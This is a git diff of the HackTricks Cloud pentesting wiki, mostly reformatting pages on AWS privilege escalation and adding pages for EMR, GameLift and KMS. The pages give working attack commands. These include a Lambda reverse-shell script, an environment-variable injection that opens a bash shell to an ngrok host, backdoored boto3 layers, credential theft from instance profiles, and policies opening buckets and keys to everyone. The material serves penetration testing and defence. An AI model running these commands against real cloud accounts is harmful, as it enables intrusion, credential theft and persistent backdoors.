it's time to **migrate** it to the **victims** env. To so so you need to **update the Bucket Policy** of your beanstalk S3 bucket so the **victim can access it** (Note that this will **open** the Bucket to **EVERYONE**): ```json { - "Version": "2008-10-17", - "Statement": [ - { - "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "s3:ListBucket", - "s3:ListBucketVersions", - "s3:GetObject", - "s3:GetObjectVersion", - "s3:*" - ], - "Resource": [ - "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022", - "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*" - ] - }, - { - "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b", - "Effect": "Deny", - "Principal": { - "AWS": "*" - }, - "Action": "s3:DeleteBucket", - "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" - } - ] + "Version": "2008-10-17", + "Statement": [ + { + "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": [ + "s3:ListBucket", + "s3:ListBucketVersions", + "s3:GetObject", + "s3:GetObjectVersion", + "s3:*" + ], + "Resource": [ + "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022", + "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*" + ] + }, + { + "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b", + "Effect": "Deny", + "Principal": { + "AWS": "*" + }, + "Action": "s3:DeleteBucket", + "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" + } + ] } ``` -{% code overflow="wrap" %} ```bash # Use a new --version-label # Use the bucket from your own account @@ -196,23 +177,9 @@ aws elasticbeanstalk update-environment --environment-name MyEnv --version-label # To get your rev shell just access the exposed web URL with params such as: http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528 -Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance). +Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance). -The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections. +The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections. ``` -{% endcode %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md new file mode 100644 index 000000000..c901b22ea --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md @@ -0,0 +1,64 @@ +# AWS - EMR Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## EMR + +More **info about EMR** in: + +{{#ref}} +../aws-services/aws-emr-enum.md +{{#endref}} + +### `iam:PassRole`, `elasticmapreduce:RunJobFlow` + +An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\ +Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`). + +```bash +# Import EC2 ssh key (you will need extra permissions for this) +ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N "" +chmod 400 /tmp/sshkey +base64 /tmp/sshkey.pub > /tmp/pub.key +aws ec2 import-key-pair \ + --key-name "privesc" \ + --public-key-material file:///tmp/pub.key + + +aws emr create-cluster \ + --release-label emr-5.15.0 \ + --instance-type m4.large \ + --instance-count 1 \ + --service-role EMR_DefaultRole \ + --ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc + +# Wait 1min and connect via ssh to an EC2 instance of the cluster) +aws emr describe-cluster --cluster-id +# In MasterPublicDnsName you can find the DNS to connect to the master instance +## You cna also get this info listing EC2 instances +``` + +Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role. + +**Potential Impact:** Privesc to the EC2 service role specified. + +### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole` + +With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role. + +> [!CAUTION] +> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related. + +**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile + +### `elasticmapreduce:OpenEditorInConsole` + +Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\ +The URL of the notebook is `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/` + +> [!CAUTION] +> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related + +**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md new file mode 100644 index 000000000..5743a2663 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md @@ -0,0 +1,18 @@ +# AWS - Gamelift + +{{#include ../../../banners/hacktricks-training.md}} + +### `gamelift:RequestUploadCredentials` + +With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**. + +```bash +aws gamelift request-upload-credentials \ + --build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111 +``` + +## References + +- [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md similarity index 60% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md index 29164911d..d6cf29c3c 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md @@ -1,19 +1,6 @@ # AWS - Glue Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## glue @@ -100,19 +87,6 @@ Just with the update permission an attacked could steal the IAM Credentials of t ## References -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) +- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md similarity index 69% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md index bc19f1341..657a16a48 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md @@ -1,27 +1,14 @@ # AWS - IAM Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## IAM For more info about IAM check: -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-iam-enum.md +{{#endref}} ### **`iam:CreatePolicyVersion`** @@ -86,11 +73,9 @@ Allows enabling a disabled access key, potentially leading to unauthorized acces **Exploit:** -{% code overflow="wrap" %} ```bash aws iam update-access-key --access-key-id --status Active --user-name ``` -{% endcode %} **Impact:** Direct privilege escalation by reactivating access keys. @@ -100,19 +85,15 @@ Enables generating or resetting credentials for specific AWS services (e.g., Cod **Exploit for Creation:** -{% code overflow="wrap" %} ```bash aws iam create-service-specific-credential --user-name --service-name ``` -{% endcode %} **Exploit for Reset:** -{% code overflow="wrap" %} ```bash aws iam reset-service-specific-credential --service-specific-credential-id ``` -{% endcode %} **Impact:** Direct privilege escalation within the user's service permissions. @@ -161,18 +142,14 @@ You can use a policy like: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": [ - "*" - ], - "Resource": [ - "*" - ] - } - ] + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": ["*"], + "Resource": ["*"] + } + ] } ``` @@ -184,11 +161,9 @@ Enables adding oneself to an IAM group, escalating privileges by inheriting the **Exploit:** -{% code overflow="wrap" %} ```bash aws iam add-user-to-group --group-name --user-name ``` -{% endcode %} **Impact:** Direct privilege escalation to the level of the group's permissions. @@ -207,16 +182,16 @@ Where the policy looks like the following, which gives the user permission to as ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "sts:AssumeRole", - "Principal": { - "AWS": "$USER_ARN" - } - } - ] + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "sts:AssumeRole", + "Principal": { + "AWS": "$USER_ARN" + } + } + ] } ``` @@ -275,15 +250,13 @@ aws iam update-saml-provider --saml-metadata-document --saml-provider-ar aws iam update-saml-provider --saml-metadata-document --saml-provider-arn ``` -{% hint style="info" %} -TODO: A Tool capable of generating the SAML metadata and login with a specified role -{% endhint %} +> [!NOTE] +> TODO: A Tool capable of generating the SAML metadata and login with a specified role ### `iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:`**`GetOpenIDConnectProvider`**) (Unsure about this) If an attacker has these **permissions** he could add a new **Thumbprint** to manage to login in all the roles trusting the provider. -{% code overflow="wrap" %} ```bash # List providers aws iam list-open-id-connect-providers @@ -292,23 +265,9 @@ aws iam get-open-id-connect-provider --open-id-connect-provider-arn # Update Thumbprints (The thumbprint is always a 40-character string) aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3 ``` -{% endcode %} ## References -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) +- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md new file mode 100644 index 000000000..9003c400a --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md @@ -0,0 +1,122 @@ +# AWS - KMS Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## KMS + +For more info about KMS check: + +{{#ref}} +../aws-services/aws-kms-enum.md +{{#endref}} + +### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`) + +With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone: + +```bash +aws kms list-keys +aws kms list-key-policies --key-id # Although only 1 max per key +aws kms get-key-policy --key-id --policy-name +# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default") +aws kms put-key-policy --key-id --policy-name --policy file:///tmp/policy.json +``` + +policy.json: + +```json +{ + "Version": "2012-10-17", + "Id": "key-consolepolicy-3", + "Statement": [ + { + "Sid": "Enable IAM User Permissions", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam:::root" + }, + "Action": "kms:*", + "Resource": "*" + }, + { + "Sid": "Allow all use", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam:::root" + }, + "Action": ["kms:*"], + "Resource": "*" + } + ] +} +``` + +### `kms:CreateGrant` + +It **allows a principal to use a KMS key:** + +```bash +aws kms create-grant \ + --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ + --grantee-principal arn:aws:iam::123456789012:user/exampleUser \ + --operations Decrypt +``` + +> [!WARNING] +> A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) + +> [!WARNING] +> Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. Once that time has passed, the principal can use the KMS key without needing to specify anything.\ +> However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\ +> For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token). + +```bash +# Use the grant token in a request +aws kms generate-data-key \ + --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ + –-key-spec AES_256 \ + --grant-tokens $token +``` + +Note that it's possible to list grant of keys with: + +```bash +aws kms list-grants --key-id +``` + +### `kms:CreateKey`, `kms:ReplicateKey` + +With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy. + +So, an attacker could abuse this to obtain privesc his access to the key and use it + +```bash +aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml + +{ + "Version": "2012-10-17", + "Id": "key-consolepolicy-3", + "Statement": [ + { + "Sid": "Enable IAM User Permissions", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "kms:*", + "Resource": "*" + } + ] +} +``` + +### `kms:Decrypt` + +This permission allows to use a key to decrypt some information.\ +For more information check: + +{{#ref}} +../aws-post-exploitation/aws-kms-post-exploitation.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md similarity index 77% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md index 57b23ef34..bd1cd7d00 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md @@ -1,27 +1,14 @@ # AWS - Lambda Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## lambda More info about lambda in: -{% content-ref url="../aws-services/aws-lambda-enum.md" %} -[aws-lambda-enum.md](../aws-services/aws-lambda-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-lambda-enum.md +{{#endref}} ### `iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`) @@ -31,8 +18,7 @@ Once the function is set up, the user can **trigger its execution** and the inte A attacker could abuse this to get a **rev shell and steal the token**: -{% code title="rev.py" %} -```python +```python:rev.py import socket,subprocess,os,time def lambda_handler(event, context): s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); @@ -44,7 +30,6 @@ def lambda_handler(event, context): time.sleep(900) return 0 ``` -{% endcode %} ```bash # Zip the rev shell @@ -95,9 +80,8 @@ cat output.txt **Potential Impact:** Direct privesc to the arbitrary lambda service role specified. -{% hint style="danger" %} -Note that even if it might looks interesting **`lambda:InvokeAsync`** **doesn't** allow on it's own to **execute `aws lambda invoke-async`**, you also need `lambda:InvokeFunction` -{% endhint %} +> [!CAUTION] +> Note that even if it might looks interesting **`lambda:InvokeAsync`** **doesn't** allow on it's own to **execute `aws lambda invoke-async`**, you also need `lambda:InvokeFunction` ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission` @@ -156,7 +140,6 @@ aws dynamodb put-item --table-name my_table \ An attacker with this permission can **grant himself (or others) any permissions** (this generates resource based policies to grant access to the resource): -{% code overflow="wrap" %} ```bash # Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode) aws lambda add-permission --function-name --statement-id asdasd --action '*' --principal arn: @@ -164,7 +147,6 @@ aws lambda add-permission --function-name --statement-id asdasd --ac # Invoke the function aws lambda invoke --function-name /tmp/outout ``` -{% endcode %} **Potential Impact:** Direct privesc to the lambda service role used by granting permission to modify the code and run it. @@ -172,12 +154,10 @@ aws lambda invoke --function-name /tmp/outout An attacker with this permission can **grant himself (or others) the permission `lambda:GetLayerVersion`**. He could access the layer and search for vulnerabilities or sensitive information -{% code overflow="wrap" %} ```bash # Give everyone the permission lambda:GetLayerVersion aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion ``` -{% endcode %} **Potential Impact:** Potential access to sensitive information. @@ -188,7 +168,6 @@ The attacker can **modify the code of the lambda to exfiltrate the IAM credentia Although the attacker might not have the direct ability to invoke the function, if the Lambda function is pre-existing and operational, it's probable that it will be triggered through existing workflows or events, thus indirectly facilitating the execution of the modified code. -{% code overflow="wrap" %} ```bash # The zip should contain the lambda code (trick: Download the current one and add your code there) aws lambda update-function-code --function-name target_function \ @@ -199,7 +178,6 @@ aws lambda invoke --function-name my_function output.txt # If not check if it's exposed in any URL or via an API gateway you could access ``` -{% endcode %} **Potential Impact:** Direct privesc to the lambda service role used. @@ -209,15 +187,15 @@ aws lambda invoke --function-name my_function output.txt With this permissions it's possible to add environment variables that will cause the Lambda to execute arbitrary code. For example in python it's possible to abuse the environment variables `PYTHONWARNING` and `BROWSER` to make a python process execute arbitrary commands: -{% code overflow="wrap" %} ```bash aws --profile none-priv lambda update-function-configuration --function-name --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}" ``` -{% endcode %} For other scripting languages there are other env variables you can use. For more info check the subsections of scripting languages in: -{% embed url="https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse" %} +{{#ref}} +https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse +{{#endref}} #### RCE via Lambda Layers @@ -263,11 +241,9 @@ You can open `./lambda_layer/boto3/__init__.py` and **add the backdoor in the gl Then, zip that `./lambda_layer` directory and **upload the new lambda layer** in your own account (or in the victims one, but you might not have permissions for this).\ Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **compatible with the python version** used by the lambda and if you upload it to your account, it needs to be in the **same region:** -{% code overflow="wrap" %} ```bash aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6" ``` -{% endcode %} Now, make the uploaded lambda layer **accessible by any account**: @@ -290,9 +266,9 @@ The next step would be to either **invoke the function** ourselves if we can or A **more stealth way to exploit this vulnerability** can be found in: -{% content-ref url="../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md" %} -[aws-lambda-layers-persistence.md](../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md +{{#endref}} **Potential Impact:** Direct privesc to the lambda service role used. @@ -304,26 +280,13 @@ Maybe with those permissions you are able to create a function and execute it ca Some lambdas are going to be **receiving sensitive info from the users in parameters.** If get RCE in one of them, you can exfiltrate the info other users are sending to it, check it in: -{% content-ref url="../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md" %} -[aws-warm-lambda-persistence.md](../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md +{{#endref}} ## References -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) +- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) +- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md similarity index 60% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md index 95ec10757..7fc698f64 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md @@ -1,31 +1,17 @@ # AWS - Lightsail Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Lightsail For more information about Lightsail check: -{% content-ref url="../aws-services/aws-lightsail-enum.md" %} -[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-lightsail-enum.md +{{#endref}} -{% hint style="warning" %} -It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service. -{% endhint %} +> [!WARNING] +> It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service. ### `lightsail:DownloadDefaultKeyPair` @@ -71,19 +57,15 @@ aws lightsail get-relational-database-master-user-password --relational-database This permission will allow you to change the password to access the database: -{% code overflow="wrap" %} ```bash aws lightsail update-relational-database --relational-database-name --master-user-password ``` -{% endcode %} If the database isn't public, you could also make it public with this permissions with -{% code overflow="wrap" %} ```bash aws lightsail update-relational-database --relational-database-name --publicly-accessible ``` -{% endcode %} **Potential Impact:** Find sensitive info inside the database. @@ -115,14 +97,12 @@ aws lightsail put-instance-public-ports \ This permissions allows to give an instances access to a bucket without any extra credentials -{% code 